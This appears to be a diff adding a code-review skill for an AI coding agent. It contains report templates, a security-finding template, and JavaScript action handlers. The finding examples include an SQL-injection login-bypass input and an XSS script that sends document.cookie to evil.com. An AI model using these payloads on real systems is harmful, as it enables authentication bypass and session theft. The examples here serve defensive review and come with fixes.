- Low-impact dead code
|
||||
---
|
||||
# Report Template
|
||||
|
||||
## Main Report Structure (REPORT.md)
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Scope**: {scope}
|
||||
**Files Reviewed**: {total_files}
|
||||
**Total Findings**: {total_findings}
|
||||
|
||||
---
|
||||
|
||||
## 📊 Executive Summary
|
||||
|
||||
### Overall Assessment
|
||||
|
||||
{Brief 2-3 paragraph assessment of code health}
|
||||
|
||||
### Risk Level: {LOW|MEDIUM|HIGH|CRITICAL}
|
||||
|
||||
{Risk assessment based on findings severity and count}
|
||||
|
||||
### Key Statistics
|
||||
|
||||
| Metric | Value | Status |
|
||||
|--------|-------|--------|
|
||||
| Total Files | {count} | - |
|
||||
| Files with Issues | {count} | {percentage}% |
|
||||
| Critical Findings | {count} | {icon} |
|
||||
| High Findings | {count} | {icon} |
|
||||
| Medium Findings | {count} | {icon} |
|
||||
| Low Findings | {count} | {icon} |
|
||||
|
||||
### Category Breakdown
|
||||
|
||||
| Category | Count | Percentage |
|
||||
|----------|-------|------------|
|
||||
| Security | {count} | {percentage}% |
|
||||
| Code Quality | {count} | {percentage}% |
|
||||
| Performance | {count} | {percentage}% |
|
||||
| Maintainability | {count} | {percentage}% |
|
||||
|
||||
---
|
||||
|
||||
## 🎯 Quality Scores
|
||||
|
||||
### Security Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Code Quality Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Performance Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Maintainability Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Overall Score: {score}/100
|
||||
|
||||
**Grade**: {A|B|C|D|F}
|
||||
|
||||
---
|
||||
|
||||
## 🔴 Critical Findings (Requires Immediate Action)
|
||||
|
||||
{List all critical findings using security-finding.md template}
|
||||
|
||||
---
|
||||
|
||||
## 🟠 High Priority Findings
|
||||
|
||||
{List all high findings}
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority Findings
|
||||
|
||||
{List all medium findings}
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Low Priority Findings
|
||||
|
||||
{List all low findings}
|
||||
|
||||
---
|
||||
|
||||
## 📋 Action Plan
|
||||
|
||||
### Immediate (Within 24 hours)
|
||||
1. {Critical issue 1}
|
||||
2. {Critical issue 2}
|
||||
3. {Critical issue 3}
|
||||
|
||||
### Short-term (Within 1 week)
|
||||
1. {High priority issue 1}
|
||||
2. {High priority issue 2}
|
||||
...
|
||||
|
||||
### Medium-term (Within 1 month)
|
||||
1. {Medium priority issue 1}
|
||||
2. {Medium priority issue 2}
|
||||
...
|
||||
|
||||
### Long-term (Within 3 months)
|
||||
1. {Low priority issue 1}
|
||||
2. {Improvement initiative 1}
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## 📊 Metrics Dashboard
|
||||
|
||||
### Code Health Trends
|
||||
|
||||
{If historical data available, show trends}
|
||||
|
||||
### File Hotspots
|
||||
|
||||
Top files with most issues:
|
||||
1. `{file-path}` - {count} issues ({severity breakdown})
|
||||
2. `{file-path}` - {count} issues
|
||||
...
|
||||
|
||||
### Technology Breakdown
|
||||
|
||||
Issues by language/framework:
|
||||
- TypeScript: {count} issues
|
||||
- Python: {count} issues
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## ✅ Compliance Status
|
||||
|
||||
### PCI DSS
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
### HIPAA
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
### GDPR
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
---
|
||||
|
||||
## 📚 Appendix
|
||||
|
||||
### A. Review Configuration
|
||||
|
||||
\`\`\`json
|
||||
{review-config}
|
||||
\`\`\`
|
||||
|
||||
### B. Tools and Versions
|
||||
|
||||
- Code Reviewer Skill: v1.0.0
|
||||
- Security Rules: OWASP Top 10 2021, CWE Top 25
|
||||
- Languages Analyzed: {list}
|
||||
|
||||
### C. References
|
||||
|
||||
- [OWASP Top 10 2021](https://owasp.org/Top10/)
|
||||
- [CWE Top 25](https://cwe.mitre.org/top25/)
|
||||
- {additional references}
|
||||
|
||||
### D. Full Findings Index
|
||||
|
||||
{Links to detailed finding JSONs}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Fix Checklist Template (FIX-CHECKLIST.md)
|
||||
|
||||
```markdown
|
||||
# Code Review Fix Checklist
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Total Items**: {count}
|
||||
|
||||
---
|
||||
|
||||
## 🔴 Critical Issues (Fix Immediately)
|
||||
|
||||
- [ ] **[SEC-001]** SQL Injection in `src/auth/user-service.ts:145`
|
||||
- Effort: 1 hour
|
||||
- Priority: P0
|
||||
- Assignee: ___________
|
||||
|
||||
- [ ] **[SEC-002]** Hardcoded JWT Secret in `src/auth/jwt.ts:23`
|
||||
- Effort: 30 minutes
|
||||
- Priority: P0
|
||||
- Assignee: ___________
|
||||
|
||||
---
|
||||
|
||||
## 🟠 High Priority Issues (Fix This Week)
|
||||
|
||||
- [ ] **[SEC-003]** Missing Authorization in `src/api/admin.ts:34`
|
||||
- Effort: 2 hours
|
||||
- Priority: P1
|
||||
- Assignee: ___________
|
||||
|
||||
- [ ] **[BP-001]** N+1 Query in `src/api/orders.ts:45`
|
||||
- Effort: 1 hour
|
||||
- Priority: P1
|
||||
- Assignee: ___________
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority Issues (Fix This Month)
|
||||
|
||||
{List medium priority items}
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Low Priority Issues (Fix Next Release)
|
||||
|
||||
{List low priority items}
|
||||
|
||||
---
|
||||
|
||||
## Progress Tracking
|
||||
|
||||
**Overall Progress**: {completed}/{total} ({percentage}%)
|
||||
|
||||
- Critical: {completed}/{total}
|
||||
- High: {completed}/{total}
|
||||
- Medium: {completed}/{total}
|
||||
- Low: {completed}/{total}
|
||||
|
||||
**Estimated Total Effort**: {hours} hours
|
||||
**Estimated Completion**: {date}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Summary JSON Template (summary.json)
|
||||
|
||||
```json
|
||||
{
|
||||
"report_date": "2024-01-15T12:00:00Z",
|
||||
"scope": "src/**/*",
|
||||
"statistics": {
|
||||
"total_files": 247,
|
||||
"files_with_issues": 89,
|
||||
"total_findings": 69,
|
||||
"by_severity": {
|
||||
"critical": 3,
|
||||
"high": 13,
|
||||
"medium": 30,
|
||||
"low": 23
|
||||
},
|
||||
"by_category": {
|
||||
"security": 24,
|
||||
"code_quality": 18,
|
||||
"performance": 12,
|
||||
"maintainability": 15
|
||||
}
|
||||
},
|
||||
"scores": {
|
||||
"security": 68,
|
||||
"code_quality": 75,
|
||||
"performance": 82,
|
||||
"maintainability": 70,
|
||||
"overall": 74
|
||||
},
|
||||
"grade": "C",
|
||||
"risk_level": "MEDIUM",
|
||||
"action_required": true,
|
||||
"compliance": {
|
||||
"pci_dss": {
|
||||
"status": "NON_COMPLIANT",
|
||||
"affecting_findings": ["SEC-001", "SEC-002", "SEC-008", "SEC-011"]
|
||||
},
|
||||
"hipaa": {
|
||||
"status": "NON_COMPLIANT",
|
||||
"affecting_findings": ["SEC-005", "SEC-009"]
|
||||
},
|
||||
"gdpr": {
|
||||
"status": "PARTIAL",
|
||||
"affecting_findings": ["SEC-002", "SEC-005", "SEC-007"]
|
||||
}
|
||||
},
|
||||
"top_issues": [
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"type": "sql-injection",
|
||||
"severity": "critical",
|
||||
"file": "src/auth/user-service.ts",
|
||||
"line": 145
|
||||
}
|
||||
],
|
||||
"hotspots": [
|
||||
{
|
||||
"file": "src/auth/user-service.ts",
|
||||
"issues": 5,
|
||||
"severity_breakdown": { "critical": 1, "high": 2, "medium": 2 }
|
||||
}
|
||||
],
|
||||
"effort_estimate": {
|
||||
"critical": 4.5,
|
||||
"high": 18,
|
||||
"medium": 35,
|
||||
"low": 12,
|
||||
"total_hours": 69.5
|
||||
}
|
||||
}
|
||||
```
|
||||
@@ -1,161 +0,0 @@
|
||||
# Security Finding Template
|
||||
|
||||
Use this template for documenting security vulnerabilities.
|
||||
|
||||
## Finding Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "SEC-{number}",
|
||||
"type": "{vulnerability-type}",
|
||||
"severity": "{critical|high|medium|low}",
|
||||
"file": "{file-path}",
|
||||
"line": {line-number},
|
||||
"column": {column-number},
|
||||
"code": "{vulnerable-code-snippet}",
|
||||
"message": "{clear-description-of-issue}",
|
||||
"cwe": "CWE-{number}",
|
||||
"owasp": "A{number}:2021 - {category}",
|
||||
"recommendation": {
|
||||
"description": "{how-to-fix}",
|
||||
"fix_example": "{corrected-code}"
|
||||
},
|
||||
"references": [
|
||||
"https://...",
|
||||
"https://..."
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Markdown Template
|
||||
|
||||
```markdown
|
||||
### 🔴 [SEC-{number}] {Vulnerability Title}
|
||||
|
||||
**File**: `{file-path}:{line}`
|
||||
**CWE**: CWE-{number} | **OWASP**: A{number}:2021 - {category}
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`{language}
|
||||
{vulnerable-code-snippet}
|
||||
\`\`\`
|
||||
|
||||
**Issue**: {Detailed explanation of the vulnerability and potential impact}
|
||||
|
||||
**Attack Example** (if applicable):
|
||||
\`\`\`
|
||||
{example-attack-payload}
|
||||
Result: {what-happens}
|
||||
Effect: {security-impact}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`{language}
|
||||
{corrected-code-with-comments}
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [{reference-title}]({url})
|
||||
- [{reference-title}]({url})
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Severity Icon Mapping
|
||||
|
||||
- Critical: 🔴
|
||||
- High: 🟠
|
||||
- Medium: 🟡
|
||||
- Low: 🟢
|
||||
|
||||
## Example: SQL Injection Finding
|
||||
|
||||
```markdown
|
||||
### 🔴 [SEC-001] SQL Injection in User Authentication
|
||||
|
||||
**File**: `src/auth/user-service.ts:145`
|
||||
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
||||
const user = await db.execute(query);
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands and bypass authentication.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
username: ' OR '1'='1' --
|
||||
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
||||
Effect: Bypasses authentication, returns all users
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use parameterized queries
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
const user = await db.execute(query, [username]);
|
||||
|
||||
// Or use ORM
|
||||
const user = await User.findOne({ where: { username } });
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
||||
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: XSS Finding
|
||||
|
||||
```markdown
|
||||
### 🟠 [SEC-002] Cross-Site Scripting (XSS) in Comment Rendering
|
||||
|
||||
**File**: `src/components/CommentList.tsx:89`
|
||||
**CWE**: CWE-79 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`tsx
|
||||
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User-generated content rendered without sanitization, allowing script injection.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
comment.body: "<script>fetch('evil.com/steal?cookie='+document.cookie)</script>"
|
||||
Effect: Steals user session cookies
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`tsx
|
||||
import DOMPurify from 'dompurify';
|
||||
|
||||
// Sanitize HTML before rendering
|
||||
<div dangerouslySetInnerHTML={{
|
||||
__html: DOMPurify.sanitize(comment.body)
|
||||
}} />
|
||||
|
||||
// Or use text content (if HTML not needed)
|
||||
<div>{comment.body}</div>
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
|
||||
- [CWE-79](https://cwe.mitre.org/data/definitions/79.html)
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Compliance Mapping Template
|
||||
|
||||
When finding affects compliance:
|
||||
|
||||
```markdown
|
||||
**Compliance Impact**:
|
||||
- **PCI DSS**: Requirement 6.5.1 (Injection flaws)
|
||||
- **HIPAA**: Technical Safeguards - Access Control
|
||||
- **GDPR**: Article 32 (Security of processing)
|
||||
```
|
||||
170
.claude/skills/review-code/SKILL.md
Normal file
@@ -0,0 +1,170 @@
|
||||
---
|
||||
name: review-code
|
||||
description: Multi-dimensional code review with structured reports. Analyzes correctness, readability, performance, security, testing, and architecture. Triggers on "review code", "code review", "审查代码", "代码审查".
|
||||
allowed-tools: Task, AskUserQuestion, Read, Write, Glob, Grep, Bash, mcp__ace-tool__search_context, mcp__ide__getDiagnostics
|
||||
---
|
||||
|
||||
# Review Code
|
||||
|
||||
Multi-dimensional code review skill that analyzes code across 6 key dimensions and generates structured review reports with actionable recommendations.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification Study (强制前置) │
|
||||
│ → 阅读 specs/review-dimensions.md │
|
||||
│ → 理解审查维度和问题分类标准 │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator (状态驱动决策) │
|
||||
│ → 读取状态 → 选择审查动作 → 执行 → 更新状态 │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
│
|
||||
┌───────────┼───────────┬───────────┬───────────┐
|
||||
↓ ↓ ↓ ↓ ↓
|
||||
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
|
||||
│ Collect │ │ Quick │ │ Deep │ │ Report │ │Complete │
|
||||
│ Context │ │ Scan │ │ Review │ │ Generate│ │ │
|
||||
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
|
||||
↓ ↓ ↓ ↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Review Dimensions │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │Correctness│ │Readability│ │Performance│ │ Security │ │
|
||||
│ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │
|
||||
│ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Testing │ │Architecture│ │
|
||||
│ └──────────┘ └──────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Key Design Principles
|
||||
|
||||
1. **多维度审查**: 覆盖正确性、可读性、性能、安全性、测试覆盖、架构一致性六大维度
|
||||
2. **分层执行**: 快速扫描识别高风险区域,深入审查聚焦关键问题
|
||||
3. **结构化报告**: 按严重程度分类,提供文件位置和修复建议
|
||||
4. **状态驱动**: 自主模式,根据审查进度动态选择下一步动作
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何审查操作之前,**必须**完整阅读以下文档。
|
||||
|
||||
### 规范文档 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度定义和检查点 | **P0 - 最高** |
|
||||
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类和严重程度标准 | **P0 - 最高** |
|
||||
| [specs/quality-standards.md](specs/quality-standards.md) | 审查质量标准 | P1 |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/review-report.md](templates/review-report.md) | 审查报告模板 |
|
||||
| [templates/issue-template.md](templates/issue-template.md) | 问题记录模板 |
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 0: Specification Study (强制前置 - 禁止跳过) │
|
||||
│ → Read: specs/review-dimensions.md │
|
||||
│ → Read: specs/issue-classification.md │
|
||||
│ → 理解审查标准和问题分类 │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: collect-context │
|
||||
│ → 收集目标文件/目录 │
|
||||
│ → 识别技术栈和语言 │
|
||||
│ → Output: state.context (files, language, framework) │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: quick-scan │
|
||||
│ → 快速扫描整体结构 │
|
||||
│ → 识别高风险区域 │
|
||||
│ → Output: state.risk_areas, state.scan_summary │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: deep-review (per dimension) │
|
||||
│ → 逐维度深入审查 │
|
||||
│ → 记录发现的问题 │
|
||||
│ → Output: state.findings[] │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: generate-report │
|
||||
│ → 汇总所有发现 │
|
||||
│ → 生成结构化报告 │
|
||||
│ → Output: review-report.md │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: complete │
|
||||
│ → 保存最终状态 │
|
||||
│ → 输出审查摘要 │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Directory Setup
|
||||
|
||||
```javascript
|
||||
// Build a compact timestamp (YYYYMMDDHHMMSS) by keeping only the digit
// characters of the ISO date-time portion (drops '-', ':', and 'T').
const timestamp = new Date().toISOString().slice(0, 19).replace(/\D/g, '');
// Per-run scratch directory for this review session.
const workDir = `.workflow/.scratchpad/review-code-${timestamp}`;

// Create the working directory and its findings subdirectory.
Bash(`mkdir -p "${workDir}"`);
Bash(`mkdir -p "${workDir}/findings"`);
|
||||
```
|
||||
|
||||
## Output Structure
|
||||
|
||||
```
|
||||
.workflow/.scratchpad/review-code-{timestamp}/
|
||||
├── state.json # 审查状态
|
||||
├── context.json # 目标上下文
|
||||
├── findings/ # 问题发现
|
||||
│ ├── correctness.json
|
||||
│ ├── readability.json
|
||||
│ ├── performance.json
|
||||
│ ├── security.json
|
||||
│ ├── testing.json
|
||||
│ └── architecture.json
|
||||
└── review-report.md # 最终审查报告
|
||||
```
|
||||
|
||||
## Review Dimensions
|
||||
|
||||
| Dimension | Focus Areas | Key Checks |
|
||||
|-----------|-------------|------------|
|
||||
| **Correctness** | 逻辑正确性 | 边界条件、错误处理、null 检查 |
|
||||
| **Readability** | 代码可读性 | 命名规范、函数长度、注释质量 |
|
||||
| **Performance** | 性能效率 | 算法复杂度、I/O 优化、资源使用 |
|
||||
| **Security** | 安全性 | 注入风险、敏感信息、权限控制 |
|
||||
| **Testing** | 测试覆盖 | 测试充分性、边界覆盖、可维护性 |
|
||||
| **Architecture** | 架构一致性 | 设计模式、分层结构、依赖管理 |
|
||||
|
||||
## Issue Severity Levels
|
||||
|
||||
| Level | Prefix | Description | Action Required |
|
||||
|-------|--------|-------------|-----------------|
|
||||
| **Critical** | [C] | 阻塞性问题,必须立即修复 | Must fix before merge |
|
||||
| **High** | [H] | 重要问题,需要修复 | Should fix |
|
||||
| **Medium** | [M] | 建议改进 | Consider fixing |
|
||||
| **Low** | [L] | 可选优化 | Nice to have |
|
||||
| **Info** | [I] | 信息性建议 | For reference |
|
||||
|
||||
## Reference Documents
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/orchestrator.md](phases/orchestrator.md) | 审查编排器 |
|
||||
| [phases/state-schema.md](phases/state-schema.md) | 状态结构定义 |
|
||||
| [phases/actions/action-collect-context.md](phases/actions/action-collect-context.md) | 收集上下文 |
|
||||
| [phases/actions/action-quick-scan.md](phases/actions/action-quick-scan.md) | 快速扫描 |
|
||||
| [phases/actions/action-deep-review.md](phases/actions/action-deep-review.md) | 深入审查 |
|
||||
| [phases/actions/action-generate-report.md](phases/actions/action-generate-report.md) | 生成报告 |
|
||||
| [phases/actions/action-complete.md](phases/actions/action-complete.md) | 完成审查 |
|
||||
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度规范 |
|
||||
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类标准 |
|
||||
| [specs/quality-standards.md](specs/quality-standards.md) | 质量标准 |
|
||||
| [templates/review-report.md](templates/review-report.md) | 报告模板 |
|
||||
| [templates/issue-template.md](templates/issue-template.md) | 问题模板 |
|
||||
@@ -0,0 +1,139 @@
|
||||
# Action: Collect Context
|
||||
|
||||
收集审查目标的上下文信息。
|
||||
|
||||
## Purpose
|
||||
|
||||
在开始审查前,收集目标代码的基本信息:
|
||||
- 确定审查范围(文件/目录)
|
||||
- 识别编程语言和框架
|
||||
- 统计代码规模
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'pending' || state.context === null
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
/**
 * Collect the review context: ask the user for a target path, enumerate
 * candidate source files, detect the dominant language and (best-effort)
 * framework, and persist the result to `${workDir}/context.json`.
 *
 * @param {object} state - Current orchestrator state (unused here except as contract).
 * @param {string} workDir - Scratch directory for this review run.
 * @returns {Promise<{stateUpdates: object}>} Updates to merge into the state.
 */
async function execute(state, workDir) {
  // 1. Ask the user which path to review.
  const input = await AskUserQuestion({
    questions: [{
      question: "请指定要审查的代码路径:",
      header: "审查目标",
      multiSelect: false,
      options: [
        { label: "当前目录", description: "审查当前工作目录下的所有代码" },
        { label: "src/", description: "审查 src/ 目录" },
        { label: "手动指定", description: "输入自定义路径" }
      ]
    }]
  });

  const targetPath = input["审查目标"] === "手动指定"
    ? input["其他"]
    : input["审查目标"] === "当前目录" ? "." : "src/";

  // 2. Enumerate candidate source files (code extensions only).
  const files = Glob(`${targetPath}/**/*.{ts,tsx,js,jsx,py,java,go,rs,cpp,c,cs}`);

  // 3. Detect the dominant language. The extension table is hoisted out
  //    of the loop (it was previously rebuilt for every file).
  const langMap = {
    'ts': 'TypeScript', 'tsx': 'TypeScript',
    'js': 'JavaScript', 'jsx': 'JavaScript',
    'py': 'Python',
    'java': 'Java',
    'go': 'Go',
    'rs': 'Rust',
    'cpp': 'C++', 'c': 'C',
    'cs': 'C#'
  };
  const languageCounts = {};
  for (const file of files) {
    const ext = file.split('.').pop();
    const lang = langMap[ext] || 'Unknown';
    languageCounts[lang] = (languageCounts[lang] || 0) + 1;
  }

  const primaryLanguage = Object.entries(languageCounts)
    .sort((a, b) => b[1] - a[1])[0]?.[0] || 'Unknown';

  // 4. Count lines of code (best effort, first 100 files only).
  let totalLines = 0;
  for (const file of files.slice(0, 100)) {
    try {
      const content = Read(file);
      totalLines += content.split('\n').length;
    } catch (e) {
      // Best-effort: unreadable files are simply not counted.
    }
  }

  // 5. Detect the framework.
  //    Fix: the previous check `files.some(f => f.includes('package.json'))`
  //    could never be true, because the Glob pattern above only matches
  //    code extensions — framework detection was dead code. Probe
  //    package.json directly and tolerate its absence.
  let framework = null;
  try {
    const pkg = JSON.parse(Read('package.json'));
    // NOTE(review): react is checked before next, so Next.js apps report
    // 'React' — confirm this ordering is intended.
    if (pkg.dependencies?.react) framework = 'React';
    else if (pkg.dependencies?.vue) framework = 'Vue';
    else if (pkg.dependencies?.angular) framework = 'Angular';
    else if (pkg.dependencies?.express) framework = 'Express';
    else if (pkg.dependencies?.next) framework = 'Next.js';
  } catch (e) {
    // No package.json (or unparsable) — leave framework as null.
  }

  // 6. Build the context object (file list capped at 200 entries).
  const context = {
    target_path: targetPath,
    files: files.slice(0, 200),
    language: primaryLanguage,
    framework: framework,
    total_lines: totalLines,
    file_count: files.length
  };

  // 7. Persist for later actions.
  Write(`${workDir}/context.json`, JSON.stringify(context, null, 2));

  return {
    stateUpdates: {
      status: 'running',
      context: context
    }
  };
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'running',
|
||||
context: {
|
||||
target_path: targetPath,
|
||||
files: fileList,
|
||||
language: primaryLanguage,
|
||||
framework: detectedFramework,
|
||||
total_lines: totalLines,
|
||||
file_count: fileCount
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `context.json`
|
||||
- **Location**: `${workDir}/context.json`
|
||||
- **Format**: JSON
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 路径不存在 | 提示用户重新输入 |
|
||||
| 无代码文件 | 返回错误,终止审查 |
|
||||
| 读取权限问题 | 跳过该文件,记录警告 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-quick-scan
|
||||
- 失败: action-abort
|
||||
115
.claude/skills/review-code/phases/actions/action-complete.md
Normal file
@@ -0,0 +1,115 @@
|
||||
# Action: Complete
|
||||
|
||||
完成审查,保存最终状态。
|
||||
|
||||
## Purpose
|
||||
|
||||
结束代码审查流程:
|
||||
- 保存最终状态
|
||||
- 输出审查摘要
|
||||
- 提供报告路径
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.report_generated === true
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
/**
 * Finalize the review: persist the terminal state to state.json, print a
 * summary banner to the console, and return the closing state updates.
 *
 * @param {object} state - Current orchestrator state (reads started_at,
 *   summary, context, report_path).
 * @param {string} workDir - Scratch directory for this review run.
 * @returns {Promise<{stateUpdates: object}>} Terminal state updates.
 */
async function execute(state, workDir) {
  // Elapsed wall-clock time since the review started.
  const elapsedMs = Date.now() - new Date(state.started_at).getTime();
  const elapsedMinutes = Math.round(elapsedMs / 60000);

  const finishedAt = new Date().toISOString();

  // Final summary = accumulated counts + timing metadata.
  const finalSummary = {
    ...state.summary,
    review_duration_ms: elapsedMs,
    completed_at: finishedAt
  };

  // Persist the terminal state snapshot.
  const terminalState = {
    ...state,
    status: 'completed',
    completed_at: finishedAt,
    summary: finalSummary
  };
  Write(`${workDir}/state.json`, JSON.stringify(terminalState, null, 2));

  // Console summary banner, printed one line at a time.
  const bannerLines = [
    '========================================',
    ' CODE REVIEW COMPLETED',
    '========================================',
    '',
    `📁 审查目标: ${state.context.target_path}`,
    `📄 文件数量: ${state.context.file_count}`,
    `📝 代码行数: ${state.context.total_lines}`,
    '',
    '--- 问题统计 ---',
    `🔴 Critical: ${finalSummary.critical}`,
    `🟠 High: ${finalSummary.high}`,
    `🟡 Medium: ${finalSummary.medium}`,
    `🔵 Low: ${finalSummary.low}`,
    `⚪ Info: ${finalSummary.info}`,
    `📊 Total: ${finalSummary.total_issues}`,
    '',
    `⏱️ 审查用时: ${elapsedMinutes} 分钟`,
    '',
    `📋 报告位置: ${state.report_path}`,
    '========================================'
  ];
  for (const line of bannerLines) {
    console.log(line);
  }

  return {
    stateUpdates: {
      status: 'completed',
      completed_at: finishedAt,
      summary: finalSummary
    }
  };
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'completed',
|
||||
completed_at: new Date().toISOString(),
|
||||
summary: {
|
||||
total_issues: state.summary.total_issues,
|
||||
critical: state.summary.critical,
|
||||
high: state.summary.high,
|
||||
medium: state.summary.medium,
|
||||
low: state.summary.low,
|
||||
info: state.summary.info,
|
||||
review_duration_ms: duration
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **Console**: 审查完成摘要
|
||||
- **State**: 最终状态保存到 `state.json`
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 状态保存失败 | 输出到控制台 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 无(终止状态)
|
||||
|
||||
## Post-Completion
|
||||
|
||||
用户可以:
|
||||
1. 查看完整报告: `cat ${workDir}/review-report.md`
|
||||
2. 查看问题详情: `cat ${workDir}/findings/*.json`
|
||||
3. 导出报告到其他位置
|
||||
302
.claude/skills/review-code/phases/actions/action-deep-review.md
Normal file
@@ -0,0 +1,302 @@
|
||||
# Action: Deep Review
|
||||
|
||||
深入审查指定维度的代码质量。
|
||||
|
||||
## Purpose
|
||||
|
||||
针对单个维度进行深入审查:
|
||||
- 逐文件检查
|
||||
- 记录发现的问题
|
||||
- 提供具体的修复建议
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.scan_completed === true
|
||||
- [ ] 存在未审查的维度
|
||||
|
||||
## Dimension Focus Areas
|
||||
|
||||
### Correctness (正确性)
|
||||
- 逻辑错误和边界条件
|
||||
- Null/undefined 处理
|
||||
- 错误处理完整性
|
||||
- 类型安全
|
||||
- 资源泄漏
|
||||
|
||||
### Readability (可读性)
|
||||
- 命名规范
|
||||
